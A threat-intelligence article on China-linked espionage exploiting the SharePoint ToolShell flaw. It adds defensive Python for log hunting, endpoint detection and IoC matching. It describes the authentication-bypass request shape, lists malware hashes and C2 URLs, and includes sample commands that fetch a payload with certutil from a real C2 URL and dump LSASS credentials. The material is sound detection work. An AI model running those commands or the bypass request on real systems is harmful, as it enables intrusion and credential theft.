China-based threat actors have exploited the critical ToolShell vulnerability in Microsoft SharePoint servers to infiltrate networks across multiple continents, targeting government agencies and critical infrastructure in a suspected espionage campaign.
This vulnerability, identified as CVE-2025-53770, enables unauthenticated remote code execution and has been actively used since its disclosure in July 2025, despite Microsoft’s rapid patching efforts.
Security researchers from Symantec report that the attacks began shortly after patches were released, affecting organizations in the Middle East, Africa, South America, and beyond.
ToolShell stems from a deserialization of untrusted data issue in on-premises SharePoint Server, allowing attackers to execute arbitrary code without authentication; SharePoint Online in Microsoft 365 is not affected.
It builds on two earlier flaws, CVE-2025-49704 (deserialization RCE) and CVE-2025-49706 (authentication bypass), which were chained at Pwn2Own Berlin in May 2025 and fixed in Microsoft's July 2025 Patch Tuesday; CVE-2025-53770 and CVE-2025-53771 are bypasses of those fixes.
The exploit chain typically starts with the authentication bypass (CVE-2025-53771): a crafted POST to the /_layouts/15/ToolPane.aspx endpoint, with DisplayMode=Edit in the query string and a Referer header pointing at /_layouts/SignOut.aspx, is accepted without credentials. The request body then carries a serialized object that SharePoint deserializes, giving the attacker arbitrary code execution on the server.
Microsoft confirmed exploitation by at least three China-linked groups, Budworm (Linen Typhoon), Sheathminer (Violet Typhoon), and Storm-2603, shortly after the patches were released on July 21, 2025.
These actors used ToolShell as a zero-day, gaining access to server file systems and internal configuration and establishing persistent access.
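The request shape described above is visible in ordinary IIS logs, so a quick retroactive hunt is possible even where no EDR was deployed. The following is an added example (not code from the Symantec report or from Microsoft) that parses IIS W3C log lines and flags three things: a POST to ToolPane.aspx whose Referer is /_layouts/SignOut.aspx (the bypass shape published in vendor detection guidance), an anonymous POST to ToolPane.aspx that received a 2xx, and any request for spinstall0.aspx, the web shell dropped by the public exploit chain. The log lines, IPs and hostnames are constructed for the demo; legitimate page editing also POSTs to ToolPane.aspx, which is why an authenticated user with an ordinary Referer is left alone.

```python
"""Hunt IIS W3C logs for the ToolShell (CVE-2025-53770/53771) request pattern.

Added example; the sample log below is constructed, not taken from an incident.
"""
import re

TOOLPANE_RE = re.compile(r"/_layouts/(1[56]/)?toolpane\.aspx$", re.I)
SIGNOUT_RE = re.compile(r"/_layouts/(1[56]/)?signout\.aspx", re.I)
WEBSHELL_RE = re.compile(r"/spinstall0\.aspx$", re.I)


def parse_w3c(lines):
    """Yield one dict per data row, keyed by the names in the #Fields header."""
    fields = None
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or not line.strip():
            continue
        if fields is None:
            raise ValueError("data row seen before a #Fields header")
        values = line.split()
        if len(values) != len(fields):
            continue  # truncated or malformed row: skip it, do not abort the hunt
        yield dict(zip(fields, values))


def classify(rec):
    """Return a finding label for one request, or None if it looks benign."""
    method = rec.get("cs-method", "").upper()
    stem = rec.get("cs-uri-stem", "")
    referer = rec.get("cs(Referer)", "-")
    user = rec.get("cs-username", "-")      # IIS logs anonymous requests as "-"
    status = rec.get("sc-status", "")
    if WEBSHELL_RE.search(stem):
        return "webshell-access"
    if method == "POST" and TOOLPANE_RE.search(stem):
        if SIGNOUT_RE.search(referer):
            return "toolshell-auth-bypass"
        if user == "-" and status.startswith("2"):
            return "anonymous-toolpane-post"
    return None


def scan(lines):
    """Return (client ip, uri, label) for every flagged request, in log order."""
    findings = []
    for rec in parse_w3c(lines):
        label = classify(rec)
        if label:
            findings.append((rec.get("c-ip", "?"), rec.get("cs-uri-stem", ""), label))
    return findings


# Constructed sample in the default IIS 10 W3C field order (spaces inside fields are '+').
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2025-07-21 03:12:44 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit&a=/ToolPane.aspx 443 - 203.0.113.7 Mozilla/5.0 /_layouts/SignOut.aspx 200 0 0 812
2025-07-21 03:12:51 10.0.0.5 GET /_layouts/15/spinstall0.aspx - 443 - 203.0.113.7 Mozilla/5.0 - 200 0 0 31
2025-07-21 03:15:02 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit 443 CORP\\jdoe 10.0.0.42 Mozilla/5.0 https://sp.corp.example/SitePages/Home.aspx 200 0 0 120
2025-07-21 03:16:10 10.0.0.5 GET /sites/hr/default.aspx - 443 CORP\\jdoe 10.0.0.42 Mozilla/5.0 - 200 0 0 45
2025-07-21 03:20:33 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit 443 - 198.51.100.23 curl/8.0 - 401 0 0 9
"""

if __name__ == "__main__":
    for ip, uri, label in scan(SAMPLE_LOG.splitlines()):
        print(f"{label:24} {ip:16} {uri}")
```

Run it against the real files under the IIS log directory for the SharePoint web application (the #Fields header varies per site, which is why the parser reads it rather than assuming column positions). The anonymous POST that got a 401 in the sample is deliberately not flagged: a blocked attempt is noise compared with a bypass that succeeded, and the 2xx filter keeps the output focused on the latter.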
Targets And Attack Patterns
The campaign’s scope is broad, with confirmed breaches in a Middle Eastern telecom firm, two African government departments, South American agencies, a U.S. university, an African state technology entity, a Middle Eastern government department, and a European finance company.
Initial access in the Middle East occurred on July 21, 2025, via a web shell, followed by DLL sideloading of malware using legitimate signed binaries from Trend Micro and Bitdefender.
In the South American cases, the attackers targeted servers running SQL, Apache HTTP Server and Adobe ColdFusion, using a renamed legitimate executable, “mantec.exe” (benign on its own, as the IoC table notes), to sideload a malicious DLL.
Evidence points to mass scanning for vulnerable servers, with selective follow-up on high-value targets for credential theft and lateral movement.
The attackers deployed Zingdoor, a Go-based HTTP backdoor linked to the Glowworm group (aka Earth Estries or FamousSparrow), first documented in 2023 for espionage against government and tech sectors.
ShadowPad, a modular RAT associated with APT41-nexus groups like Blackfly, was also used via DLL sideloading for command execution and updates.
KrustyLoader, a Rust loader tied to UNC5221 (a China-nexus actor), delivered second-stage payloads including Sliver, an open-source red-team C2 framework that is widely abused by threat actors.
Alongside these, the attackers used living-off-the-land binaries and publicly available tools: Certutil to download payloads, ProcDump and LsassDumper to dump LSASS memory for credentials, GoGo Scanner for reconnaissance, Revsocks for reverse SOCKS proxying, and the PetitPotam NTLM-coercion exploit (CVE-2021-36942) for privilege escalation.
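Most of this post-exploitation tooling leaves recognisable traces in endpoint telemetry. The block below is an added example (not code from the Symantec report) of detection rules run over Sysmon-style process-creation (EventID 1) and image-load (EventID 7) events. The command-line regexes encode the shapes these tools are normally invoked with (certutil -urlcache, procdump -ma lsass, rundll32 comsvcs.dll MiniDump, and a revsocks -connect/-pass heuristic), and the sideload check is this example's own design: an unsigned DLL loaded from the same directory as an executable that lives outside the Windows and Program Files trees, which is exactly the mantec.exe/bugsplatrc.dll arrangement described above. All events, paths and hostnames are constructed.

```python
"""Flag the post-exploitation tooling from the ToolShell campaign in endpoint events.

Added example; the EVENTS list is constructed for the demo.
"""
import ntpath
import re

PROC_RULES = [
    ("certutil-download", re.compile(r"certutil(\.exe)?\b.*-urlcache", re.I)),
    ("lsass-dump-procdump", re.compile(r"procdump(64)?(\.exe)?\b.*\blsass", re.I)),
    ("lsass-dump-comsvcs", re.compile(r"rundll32(\.exe)?\b.*comsvcs\.dll.*minidump", re.I)),
    # revsocks is usually run as "revsocks -connect host:port -pass <pw>"; the binary is often renamed,
    # so match the argument shape rather than the image name (heuristic, this example's assumption).
    ("reverse-socks-proxy", re.compile(r"-connect\s+\S+:\d+.*-pass\b", re.I)),
]

# Directories where vendor-signed binaries legitimately load their own DLLs.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def detect_process(ev):
    """EventID 1: match the command line against every rule, return all hits."""
    cmd = ev.get("cmd", "")
    return [name for name, rx in PROC_RULES if rx.search(cmd)]


def detect_image_load(ev):
    """EventID 7: unsigned DLL loaded from the executable's own, untrusted directory."""
    proc_dir = ntpath.dirname(ev["image"]).lower() + "\\"
    dll_dir = ntpath.dirname(ev["loaded"]).lower() + "\\"
    if proc_dir != dll_dir:
        return []
    if proc_dir.startswith(TRUSTED_DIRS):
        return []
    if ev.get("signed", "false").lower() == "true" and ev.get("sig_status", "") == "Valid":
        return []
    return ["possible-dll-sideload"]


def detect(ev):
    if ev["id"] == 1:
        return detect_process(ev)
    if ev["id"] == 7:
        return detect_image_load(ev)
    return []


# Constructed Sysmon-style events: the first four should fire, the last two should not.
EVENTS = [
    {"id": 1, "image": "C:\\Windows\\System32\\certutil.exe",
     "cmd": "certutil -urlcache -split -f http://kia-almotores.s3.amazonaws.com/sy1cyjt C:\\Users\\Public\\sy1.dat"},
    {"id": 1, "image": "C:\\Users\\Public\\procdump64.exe",
     "cmd": "procdump64.exe -accepteula -ma lsass.exe C:\\Users\\Public\\ls.dmp"},
    {"id": 1, "image": "C:\\Windows\\System32\\rundll32.exe",
     "cmd": "rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump 624 C:\\Users\\Public\\l.dmp full"},
    {"id": 7, "image": "C:\\ProgramData\\Update\\mantec.exe",
     "loaded": "C:\\ProgramData\\Update\\bugsplatrc.dll", "signed": "false", "sig_status": ""},
    {"id": 7, "image": "C:\\Program Files\\Vendor\\agent.exe",
     "loaded": "C:\\Program Files\\Vendor\\helper.dll", "signed": "true", "sig_status": "Valid"},
    {"id": 1, "image": "C:\\Windows\\System32\\notepad.exe",
     "cmd": "notepad.exe C:\\Users\\jdoe\\notes.txt"},
]


def run(events=EVENTS):
    """Return (event index, findings) for every event that triggers at least one rule."""
    out = []
    for i, ev in enumerate(events):
        findings = detect(ev)
        if findings:
            out.append((i, findings))
    return out


if __name__ == "__main__":
    for i, findings in run():
        print(i, findings)
```

The sideload heuristic is deliberately coarse: vendor binaries copied into ProgramData or a user profile and loading an unsigned DLL next to themselves is the pattern to chase, while the same pairing under Program Files is usually the product working as designed. Expect to tune TRUSTED_DIRS for installers that legitimately run from other locations.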
This activity shows ToolShell abuse well beyond the initial reports and underscores the need to patch on-premises SharePoint servers urgently. Patching alone is not enough for a server that was already exploited: the ASP.NET machine keys should be rotated and IIS restarted, because stolen key material lets an attacker keep forging valid ViewState payloads after the fix is applied.
With over 400 compromised servers reported and tooling overlaps with the group tracked as Salt Typhoon (Glowworm/Earth Estries), the operations point to state-sponsored espionage focused on persistent, stealthy network access.
IoCs
Type | Indicator | Description |
---|---|---|
SHA256 Hash | 6240e39475f04bfe55ab7cba8746bd08901d7678b1c7742334d56f2bc8620a35 | LsassDumper |
SHA256 Hash | 929e3fdd3068057632b52ecdfd575ab389390c852b2f4e65dc32f20c87521600 | KrustyLoader |
SHA256 Hash | db15923c814a4b00ddb79f9c72f8546a44302ac2c66c7cc89a144cb2c2bb40fa | Likely ShadowPad |
SHA256 Hash | e6c216cec379f418179a3f6a79df54dcf6e6e269a3ce3479fd7e6d4a15ac066e | ShadowPad Loader |
SHA256 Hash | 071e662fc5bc0e54bcfd49493467062570d0307dc46f0fb51a68239d281427c6 | Zingdoor |
SHA256 Hash | 1f94ea00be79b1e4e8e0b7bbf2212f2373da1e13f92b4ca2e9e0ffc5f93e452b | PetitPotam/CVE-2021-36942 exploit |
SHA256 Hash | dbdc1beeb5c72d7b505a9a6c31263fc900ea3330a59f08e574fd172f3596c1b8 | RevSocks |
SHA256 Hash | 6aecf805f72c9f35dadda98177f11ca6a36e8e7e4348d72eaf1a80a899aa6566 | LsassDumper |
SHA256 Hash | 568561d224ef29e5051233ab12d568242e95d911b08ce7f2c9bf2604255611a9 | Socks Proxy |
SHA256 Hash | 28a859046a43fc8a7a7453075130dd649eb2d1dd0ebf0abae5d575438a25ece9 | GoGo Scanner |
SHA256 Hash | 7be8e37bc61005599e4e6817eb2a3a4a5519fded76cb8bf11d7296787c754d40 | Sliver |
SHA256 Hash | 5b165b01f9a1395cae79e0f85b7a1c10dc089340cf4e7be48813ac2f8686ed61 | ProcDump |
SHA256 Hash | e4ea34a7c2b51982a6c42c6367119f34bec9aeb9a60937836540035583a5b3bc | ProcDump |
SHA256 Hash | 7803ae7ba5d4e7d38e73745b3f321c2ca714f3141699d984322fa92e0ff037a1 | Minidump |
SHA256 Hash | 7acf21677322ef2aa835b5836d3e4b8a6b78ae10aa29d6640885e933f83a4b01 | mantec.exe (Benign executable) |
SHA256 Hash | 6c48a510642a1ba516dbc5effe3671524566b146e04d99ab7f4832f66b3f95aa | bugsplatrc.dll |
URL | http://kia-almotores.s3.amazonaws[.]com/sy1cyjt | KrustyLoader C&C server |
URL | http://omnileadzdev.s3.amazonaws[.]com/PBfbN58lX | KrustyLoader C&C server |
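To put the table to use, the following added example (not code from the Symantec report) loads the hashes and URLs above, walks a directory tree computing SHA256 of every file, and matches proxy log lines against the refanged URLs. Matching on the S3 bucket host as well as the full URL is this example's own choice, on the assumption that loader paths on throwaway buckets change more often than the bucket name. The proxy log lines and the temporary sample file are constructed for the demo; note that the ProcDump and mantec.exe hashes are legitimate binaries, so a hit on those is a lead to investigate, not proof of compromise.

```python
"""Match files and proxy logs against the ToolShell campaign IoCs.

Added example; the hash and URL tables reproduce the article's indicators,
everything else (sample file, log lines) is constructed.
"""
import hashlib
import os
import tempfile
from urllib.parse import urlparse

IOC_HASHES = {
    "6240e39475f04bfe55ab7cba8746bd08901d7678b1c7742334d56f2bc8620a35": "LsassDumper",
    "929e3fdd3068057632b52ecdfd575ab389390c852b2f4e65dc32f20c87521600": "KrustyLoader",
    "db15923c814a4b00ddb79f9c72f8546a44302ac2c66c7cc89a144cb2c2bb40fa": "Likely ShadowPad",
    "e6c216cec379f418179a3f6a79df54dcf6e6e269a3ce3479fd7e6d4a15ac066e": "ShadowPad Loader",
    "071e662fc5bc0e54bcfd49493467062570d0307dc46f0fb51a68239d281427c6": "Zingdoor",
    "1f94ea00be79b1e4e8e0b7bbf2212f2373da1e13f92b4ca2e9e0ffc5f93e452b": "PetitPotam/CVE-2021-36942 exploit",
    "dbdc1beeb5c72d7b505a9a6c31263fc900ea3330a59f08e574fd172f3596c1b8": "RevSocks",
    "6aecf805f72c9f35dadda98177f11ca6a36e8e7e4348d72eaf1a80a899aa6566": "LsassDumper",
    "568561d224ef29e5051233ab12d568242e95d911b08ce7f2c9bf2604255611a9": "Socks Proxy",
    "28a859046a43fc8a7a7453075130dd649eb2d1dd0ebf0abae5d575438a25ece9": "GoGo Scanner",
    "7be8e37bc61005599e4e6817eb2a3a4a5519fded76cb8bf11d7296787c754d40": "Sliver",
    "5b165b01f9a1395cae79e0f85b7a1c10dc089340cf4e7be48813ac2f8686ed61": "ProcDump (legitimate tool)",
    "e4ea34a7c2b51982a6c42c6367119f34bec9aeb9a60937836540035583a5b3bc": "ProcDump (legitimate tool)",
    "7803ae7ba5d4e7d38e73745b3f321c2ca714f3141699d984322fa92e0ff037a1": "Minidump",
    "7acf21677322ef2aa835b5836d3e4b8a6b78ae10aa29d6640885e933f83a4b01": "mantec.exe (benign executable)",
    "6c48a510642a1ba516dbc5effe3671524566b146e04d99ab7f4832f66b3f95aa": "bugsplatrc.dll",
}
IOC_URLS = [
    "http://kia-almotores.s3.amazonaws[.]com/sy1cyjt",
    "http://omnileadzdev.s3.amazonaws[.]com/PBfbN58lX",
]


def refang(ioc):
    """Turn a defanged indicator back into the literal string that appears in logs."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


def sha256_file(path, chunk=1 << 20):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def scan_tree(root, iocs=IOC_HASHES):
    """Return (path, sha256, label) for every file under root whose hash is an IoC."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                digest = sha256_file(path)
            except OSError:
                continue  # unreadable or vanished file: keep going
            if digest in iocs:
                hits.append((path, digest, iocs[digest]))
    return hits


def match_urls(log_lines, iocs=IOC_URLS):
    """Return (line number, host, 'url'|'host') for lines touching an IoC URL or its host."""
    urls = [refang(u) for u in iocs]
    hits = []
    for n, line in enumerate(log_lines, 1):
        low = line.lower()
        for u in urls:
            host = urlparse(u).hostname
            if u.lower() in low:
                hits.append((n, host, "url"))
                break
            if host in low:
                hits.append((n, host, "host"))
                break
    return hits


# Constructed demo material: a file with known content, and three proxy log lines.
DEMO_HASH = "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad"  # sha256(b"abc")


def make_demo_dir():
    d = tempfile.mkdtemp(prefix="ioc-demo-")
    with open(os.path.join(d, "abc.bin"), "wb") as f:
        f.write(b"abc")
    return d


SAMPLE_PROXY_LOG = """2025-07-21T03:13:01Z 10.0.0.5 GET http://kia-almotores.s3.amazonaws.com/sy1cyjt 200 1452
2025-07-21T03:13:09Z 10.0.0.5 CONNECT omnileadzdev.s3.amazonaws.com:443 200 0
2025-07-21T03:14:00Z 10.0.0.42 GET https://update.example.com/catalog.xml 200 8801
"""

if __name__ == "__main__":
    d = make_demo_dir()
    print(scan_tree(d))                                       # no hit against the real IoC list
    print(scan_tree(d, {DEMO_HASH: "constructed-sample"}))    # hit when the demo hash is supplied
    print(match_urls(SAMPLE_PROXY_LOG.splitlines()))
```

On a SharePoint host the directories worth walking first are the web application's LAYOUTS folder, ProgramData, and user profiles, since those are where the web shell and the sideloading pairs were staged. The CONNECT line in the sample shows why host matching matters: a TLS proxy only ever records the bucket hostname, never the object path.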